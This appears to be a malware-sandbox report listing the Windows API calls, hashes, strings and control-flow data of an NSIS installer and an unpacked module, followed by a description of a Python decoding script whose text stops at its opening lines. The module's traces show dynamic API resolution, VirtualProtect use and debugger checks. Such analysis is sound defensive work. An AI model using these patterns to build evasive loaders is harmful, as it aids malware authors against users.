• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction ID: 38a287221bb864a08eec9e35cc4bf0df81a49f50ffc74c275539a26101e858c6
• Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction Fuzzy Hash: 622148668183816FFF118B754C04BB67FDA9B132B0F98C696D180CF143D6A89446C3F2

Control-flow Graph

APIs
• GetProcAddress.KERNEL32(00000000,367BC7F4), ref: 367BC804
• VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,367BC7F4,367BC7DD), ref: 367BC816
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,367BC7F4,367BC7DD), ref: 367BC82A
• GetModuleHandleA.KERNEL32(?,367BC7DD), ref: 367BC838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 367BC860
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: AddressProcProtectVirtual$HandleModule
• String ID:
• API String ID: 2152742572-0
• Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction ID: 71530bfd0b6a74d3f31a946c2041dc147e8d863b820d068379050e32daba8f44
• Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction Fuzzy Hash: 72F0F685D453503CFE1145B50C45EB65FCE8B676A0BE0DA56E250CF183D9D58506C3F6

Control-flow Graph

APIs
• SetErrorMode.KERNEL32 ref: 00403216
• GetVersion.KERNEL32 ref: 0040321C
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040324F
• #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040328B
• OleInitialize.OLE32(00000000), ref: 00403292
• SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032AE
• GetCommandLineA.KERNEL32(0042EC00,NSIS Error,?,00000006,00000008,0000000A), ref: 004032C3
• GetModuleHandleA.KERNEL32(00000000,00435000,00000000,?,00000006,00000008,0000000A), ref: 004032D6
• CharNextA.USER32(00000000,00435000,00000020,?,00000006,00000008,0000000A), ref: 00403301
• GetTempPathA.KERNEL32(00000400,00436400,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033FE
• GetWindowsDirectoryA.KERNEL32(00436400,000003FB,?,00000006,00000008,0000000A), ref: 0040340F
• lstrcatA.KERNEL32(00436400,\Temp,?,00000006,00000008,0000000A), ref: 0040341B
• GetTempPathA.KERNEL32(000003FC,00436400,00436400,\Temp,?,00000006,00000008,0000000A), ref: 0040342F
• lstrcatA.KERNEL32(00436400,Low,?,00000006,00000008,0000000A), ref: 00403437
• SetEnvironmentVariableA.KERNEL32(TEMP,00436400,00436400,Low,?,00000006,00000008,0000000A), ref: 00403448
• SetEnvironmentVariableA.KERNEL32(TMP,00436400,?,00000006,00000008,0000000A), ref: 00403450
• DeleteFileA.KERNEL32(00436000,?,00000006,00000008,0000000A), ref: 00403464
  • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
  • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
  • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,0042EC00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
  • Part of subcall function 004037B5: lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,?,761F3410), ref: 004038A5
                                                                                                                                                                                      • Part of subcall function 004037B5: lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,?,761F3410), ref: 004038A5
                                                                                                                                                                                      • Part of subcall function 004037B5: lstrcmpiA.KERNEL32(?,.exe), ref: 004038B8
                                                                                                                                                                                      • Part of subcall function 004037B5: GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038C3
                                                                                                                                                                                      • Part of subcall function 004037B5: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 0040390C
                                                                                                                                                                                      • Part of subcall function 004037B5: RegisterClassA.USER32(0042EBA0), ref: 00403949
                                                                                                                                                                                      • Part of subcall function 004036DB: CloseHandle.KERNEL32(FFFFFFFF,00403512,?,?,00000006,00000008,0000000A), ref: 004036E6
                                                                                                                                                                                    • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403512
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403533
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403650
                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403657
                                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040366F
                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040368E
                                                                                                                                                                                    • ExitWindowsEx.USER32(?,80040002), ref: 004036B2
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004036D5
                                                                                                                                                                                      • Part of subcall function 00405681: MessageBoxIndirectA.USER32(0040A218), ref: 004056DC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$ExitFileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                                                                    • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K v$~nsu
                                                                                                                                                                                    • API String ID: 3855923921-986466628
                                                                                                                                                                                    • Opcode ID: e4cd146345a9ea09f61e1cd1bab928ecbc887433274b998fcf644788d9cec410
                                                                                                                                                                                    • Instruction ID: 41c275c355797b12fd9b138c60a2ad170ddd3a1f93bd6a9867a2704463122372
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4cd146345a9ea09f61e1cd1bab928ecbc887433274b998fcf644788d9cec410
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DC1E470604741AAD7216F759E49B2F3EACAF45706F44053FF581B61E2CB7C8A098B2E

Control-flow Graph
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404A21
• GetDlgItem.USER32(?,00000408), ref: 00404A2C
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404A76
• LoadBitmapA.USER32(0000006E), ref: 00404A89
• SetWindowLongA.USER32(?,000000FC,00405000), ref: 00404AA2
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AB6
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AC8
• SendMessageA.USER32(?,00001109,?), ref: 00404ADE
• SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEA
• SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AFC
• DeleteObject.GDI32(00000000), ref: 00404AFF
• SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2A
• SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B36
• SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BCB
• SendMessageA.USER32(?,0000110A,?,00000000), ref: 00404BF6
• SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0A
• GetWindowLongA.USER32(?,000000F0), ref: 00404C39
• SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C47
• ShowWindow.USER32(?,00000005), ref: 00404C58
• SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D55
• SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBA
• SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DCF
• SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF3
• SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E13
• ImageList_Destroy.COMCTL32(?), ref: 00404E28
• GlobalFree.KERNEL32(?), ref: 00404E38
• SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB1
• SendMessageA.USER32(?,00001102,?,?), ref: 00404F5A
• SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F69
• InvalidateRect.USER32(?,00000000,00000001), ref: 00404F89
• ShowWindow.USER32(?,00000000), ref: 00404FD7
• GetDlgItem.USER32(?,000003FE), ref: 00404FE2
• ShowWindow.USER32(00000000), ref: 00404FE9
Strings
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 1638840714-813528018
• Opcode ID: 3b740f44a2b1d633ad343a76b016798f79b98c3f4b333677a90c7392331c9530
• Instruction ID: 5e7fd9033250abe3372a8cc080de2667683fe8f184775387c018329cb0bba4e6
• Opcode Fuzzy Hash: 3b740f44a2b1d633ad343a76b016798f79b98c3f4b333677a90c7392331c9530
• Instruction Fuzzy Hash: 9502A1B0A00209AFEB20DF55DD85AAE7BB5FB84315F14413AFA10B62E1C7789D42CF58
APIs
• GetTickCount.KERNEL32 ref: 00402D59
• GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400), ref: 00402D75
  • Part of subcall function 00405AFE: GetFileAttributesA.KERNEL32(?,00402D88,00436C00,80000000,?), ref: 00405B02
  • Part of subcall function 00405AFE: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
• GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,?), ref: 00402DC1
Strings
• Inst, xrefs: 00402E2D
• Null, xrefs: 00402E3F
• soft, xrefs: 00402E36
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F20
• Error launching installer, xrefs: 00402D98
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: File$AttributesCountCreateModuleNameSizeTick
• String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
• API String ID: 4283519449-1074636621
• Opcode ID: bfd8ed3c0dfd54d9895a7dd254a8437a99cec9953569f61149433e9ea538f05b
• Instruction ID: b7ea9236aecaa86e611592eb70b2ed5589fa10121b1bd9207fea2451aa196312
• Opcode Fuzzy Hash: bfd8ed3c0dfd54d9895a7dd254a8437a99cec9953569f61149433e9ea538f05b
• Instruction Fuzzy Hash: 9D51F431A00215ABDB20AF64DE89B9F7BB8FB14358F50413BE504B72D1C7B88D858B9C
APIs
• DeleteFileA.KERNEL32(?,?,761F3410,00436400,00000000), ref: 00405756
• lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,761F3410,00436400,00000000), ref: 0040579E
• lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,761F3410,00436400,00000000), ref: 004057BF
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,761F3410,00436400,00000000), ref: 004057C5
                                                                                                                                                                                    • FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,761F3410,00436400,00000000), ref: 004057D6
                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405883
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405894
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                    • API String ID: 2035342205-1173974218
                                                                                                                                                                                    • Opcode ID: 5a75186390c9518ef53bc7868eb0b51ef72d35058a64af47be824dbaeb8436d1
                                                                                                                                                                                    • Instruction ID: 2a0351abb2716448ee460da7bfccfa5d3c7c3698b554042fcfc8e424752a7a40
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a75186390c9518ef53bc7868eb0b51ef72d35058a64af47be824dbaeb8436d1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2551B132900A04AAEF217B268C45FBF7A78DF42754F14817BF841B61D1D73C8952DEA9
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 367B2645
• IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 367B2710
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 367B2730
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 367B273A
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: ddc1fd082a0dc1be718e10a79c61e4cc284a3037370b7fda3b800b5215724e49
• Instruction ID: 0a9bfb46ec4a0883a590ed44526b1eaef3bbe44e95cf3910cbc3c4791f27073d
• Opcode Fuzzy Hash: ddc1fd082a0dc1be718e10a79c61e4cc284a3037370b7fda3b800b5215724e49
• Instruction Fuzzy Hash: 59314B75D0621C9BDF10DF60C989BCDBBB8AF08304F5041AAE50CAB250EB709A85CF49
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 367B2276
• GetCurrentThreadId.KERNEL32 ref: 367B2285
• GetCurrentProcessId.KERNEL32 ref: 367B228E
• QueryPerformanceCounter.KERNEL32(?), ref: 367B229B
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 0e1e6dcce02965ac936fda1723803932b31940850197981ba16f3077bce8d874
• Instruction ID: 6750ebe7ba93355610d9cb24dabc8188750af17a1a6008ba8b68f4ad4ca40175
• Opcode Fuzzy Hash: 0e1e6dcce02965ac936fda1723803932b31940850197981ba16f3077bce8d874
• Instruction Fuzzy Hash: 82F05F75C20209EBCB04DBB4C649A9EBBF8FF18315F9144959512F7140E774AB069F51
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,367B2C3B,367BD1DC,00000017), ref: 367B2B21
• UnhandledExceptionFilter.KERNEL32(367BD1DC,?,367B2C3B,367BD1DC,00000017), ref: 367B2B2A
• GetCurrentProcess.KERNEL32(C0000409,?,367B2C3B,367BD1DC,00000017), ref: 367B2B35
• TerminateProcess.KERNEL32(00000000,?,367B2C3B,367BD1DC,00000017), ref: 367B2B3C
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID:
• API String ID: 3231755760-0
• Opcode ID: c6b5390c6209e037fdf314352ae5a69b89442324a9ca7014099334bd9b815753
• Instruction ID: f47d240fe4289bde86f2aae971c9e5abbf20398c3f0b412a2a6b393535fcb9c2
• Opcode Fuzzy Hash: c6b5390c6209e037fdf314352ae5a69b89442324a9ca7014099334bd9b815753
• Instruction Fuzzy Hash: 6DD01232128208ABCB002FE0CD0DE993F2AEB0821AF800010FB0AE3040CB318403CB61
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 367B61DA
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 367B61E4
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 367B61F1
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 5e27906ea42b1cb2df4d2733db0e217d4f1ce8c20c2e218d589f399583b2051f
• Instruction ID: a9cd128aefada58db544c913f37af02a83ad52051cfd27b7eb5f7cc55603c7a9
• Opcode Fuzzy Hash: 5e27906ea42b1cb2df4d2733db0e217d4f1ce8c20c2e218d589f399583b2051f
• Instruction Fuzzy Hash: C531D37491121C9BCF21DF24D988BDDBBB9EF08310F9041EAE91CAB260E7709B918F45
APIs
• GetCurrentProcess.KERNEL32(?,?,367B4A8A,?,367C2238,0000000C,367B4BBD,00000000,00000000,00000001,367B2082,367C2108,0000000C,367B1F3A,?), ref: 367B4AD5
• TerminateProcess.KERNEL32(00000000,?,367B4A8A,?,367C2238,0000000C,367B4BBD,00000000,00000000,00000001,367B2082,367C2108,0000000C,367B1F3A,?), ref: 367B4ADC
• ExitProcess.KERNEL32 ref: 367B4AEE
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 6340c1bf9466f0885597779416af62fe1dd4007accd9cacee55fc5769d62edb8
• Instruction ID: 49a35aa8d7e947d5e5293fc36799059fcd61e6845346ca7f978b190cbe504780
• Opcode Fuzzy Hash: 6340c1bf9466f0885597779416af62fe1dd4007accd9cacee55fc5769d62edb8
• Instruction Fuzzy Hash: C6E0B63A520208AFCF016F65CD18E593B6BEF44381BA04024FB05DB529DB35D953CA69
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 367B294C
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: e03f0b9a8b6f3be0f0fbe8c8749f6a3476a9026383d17b1d37d0c63a71618bc5
• Instruction ID: 54f7d2b0c320e83a6da463df59ea223658a1a68f33eecd9c58d944f714ad3492
• Opcode Fuzzy Hash: e03f0b9a8b6f3be0f0fbe8c8749f6a3476a9026383d17b1d37d0c63a71618bc5
• Instruction Fuzzy Hash: 03417FB1D222049BEB10CF55C5C16AABBF6FF48310FA4856AD915FB354D3789A41CFA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                    • Opcode ID: 3415cc72deed2181cee0608b13cda678370153c9f0231b0264e3578e35451fa0
                                                                                                                                                                                    • Instruction ID: f0ec0746120019b03bcee6f0c13b160c4d277fe21ab7e96025c36e8102860491
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3415cc72deed2181cee0608b13cda678370153c9f0231b0264e3578e35451fa0
                                                                                                                                                                                    • Instruction Fuzzy Hash: F2A011302002038F83008E30828A28C3AAEAA002A03800028AA08E2000EB2880028A00
Control-flow Graph
control_flow_graph 395 4051ca-4051e6 396 405375-40537b 395->396 397 4051ec-4052b3 GetDlgItem * 3 call 40405b call 40492a GetClientRect GetSystemMetrics SendMessageA * 2 395->397 399 4053a5-4053b1 396->399 400 40537d-40539f GetDlgItem CreateThread CloseHandle 396->400 419 4052d1-4052d4 397->419 420 4052b5-4052cf SendMessageA * 2 397->420 402 4053d3-4053d9 399->402 403 4053b3-4053b9 399->403 400->399 404 4053db-4053e1 402->404 405 40542e-405431 402->405 407 4053f4-4053fb call 40408d 403->407 408 4053bb-4053ce ShowWindow * 2 call 40405b 403->408 409 4053e3-4053ef call 403fff 404->409 410 405407-405417 ShowWindow 404->410 405->407 413 405433-405439 405->413 416 405400-405404 407->416 408->402 409->407 417 405427-405429 call 403fff 410->417 418 405419-405422 call 40508c 410->418 413->407 421 40543b-40544e SendMessageA 413->421 417->405 418->417 424 4052e4-4052fb call 404026 419->424 425 4052d6-4052e2 SendMessageA 419->425 420->419 426 405454-405480 CreatePopupMenu call 405f87 AppendMenuA 421->426 427 40554b-40554d 421->427 434 405331-405352 GetDlgItem SendMessageA 424->434 435 4052fd-405311 ShowWindow 424->435 425->424 432 405482-405492 GetWindowRect 426->432 433 405495-4054ab TrackPopupMenu 426->433 427->416 432->433 433->427 436 4054b1-4054cb 433->436 434->427 439 405358-405370 SendMessageA * 2 434->439 437 405320 435->437 438 405313-40531e ShowWindow 435->438 440 4054d0-4054eb SendMessageA 436->440 441 405326-40532c call 40405b 437->441 438->441 439->427 440->440 442 4054ed-40550d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 440->442 441->434 444 40550f-40552f SendMessageA 442->444 444->444 445 405531-405545 GlobalUnlock SetClipboardData CloseClipboard 444->445 445->427
APIs
• GetDlgItem.USER32(?,00000403), ref: 00405229
• GetDlgItem.USER32(?,000003EE), ref: 00405238
• GetClientRect.USER32(?,?), ref: 00405275
• GetSystemMetrics.USER32(?), ref: 0040527C
• SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040529D
• SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052AE
• SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C1
• SendMessageA.USER32(?,00001026,00000000,?), ref: 004052CF
• SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E2
• ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405304
• ShowWindow.USER32(?,00000008), ref: 00405318
• GetDlgItem.USER32(?,000003EC), ref: 00405339
• SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405349
• SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405362
• SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040536E
• GetDlgItem.USER32(?,000003F8), ref: 00405247
  • Part of subcall function 0040405B: SendMessageA.USER32(00000028,?,00000001,00403E8B), ref: 00404069
• GetDlgItem.USER32(?,000003EC), ref: 0040538A
• CreateThread.KERNEL32(00000000,00000000,Function_0000515E,00000000), ref: 00405398
• CloseHandle.KERNEL32(00000000), ref: 0040539F
• ShowWindow.USER32(00000000), ref: 004053C2
• ShowWindow.USER32(?,00000008), ref: 004053C9
• ShowWindow.USER32(00000008), ref: 0040540F
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405443
• CreatePopupMenu.USER32 ref: 00405454
• AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405469
• GetWindowRect.USER32(?,000000FF), ref: 00405489
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A2
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054DE
• OpenClipboard.USER32(00000000), ref: 004054EE
• EmptyClipboard.USER32 ref: 004054F4
• GlobalAlloc.KERNEL32(00000042,?), ref: 004054FD
• GlobalLock.KERNEL32(00000000), ref: 00405507
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040551B
• GlobalUnlock.KERNEL32(00000000), ref: 00405534
• SetClipboardData.USER32(00000001,00000000), ref: 0040553F
• CloseClipboard.USER32 ref: 00405545
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID:
• API String ID: 590372296-0
• Opcode ID: d5273281f7ca55948d0d67e565d88e3eec44a4adc77553a27c5bfa0cd5b41917
• Instruction ID: ba98567820032f63b871bd6861c5d6e43a3521a54ecc658c1b1e5281d96d67ec
• Opcode Fuzzy Hash: d5273281f7ca55948d0d67e565d88e3eec44a4adc77553a27c5bfa0cd5b41917
• Instruction Fuzzy Hash: D6A14971900608BFDF11AF61DE89AAF7F79EB04354F40403AFA41B61A0CB755E519F68
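The API listings in this report (the function above, which reads list-view text and writes it to the clipboard, and the dialog-procedure and window-setup functions further down) are easier to read once the raw SendMessageA message numbers and flag words are resolved. The Python script below is an added example written for this page; it is not code from Joe Sandbox or from the analysed sample. It parses lines in the report's "APIs" format, maps the message numbers that occur on this page to their commctrl.h and winuser.h names (LVM_, PBM_ and clipboard/menu constants; the tables deliberately cover only those values), and checks whether a function's own calls, ordered by call-site address rather than listing order, contain the OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard sequence. The sample input is copied from the listing for the function at 4051ca. Arguments the sandbox could not recover are shown as "?" and are left as they are, so a decoded name is a reading aid, not a verified operand.

```python
"""Decode Joe Sandbox 'APIs' listing lines into readable Win32 calls.
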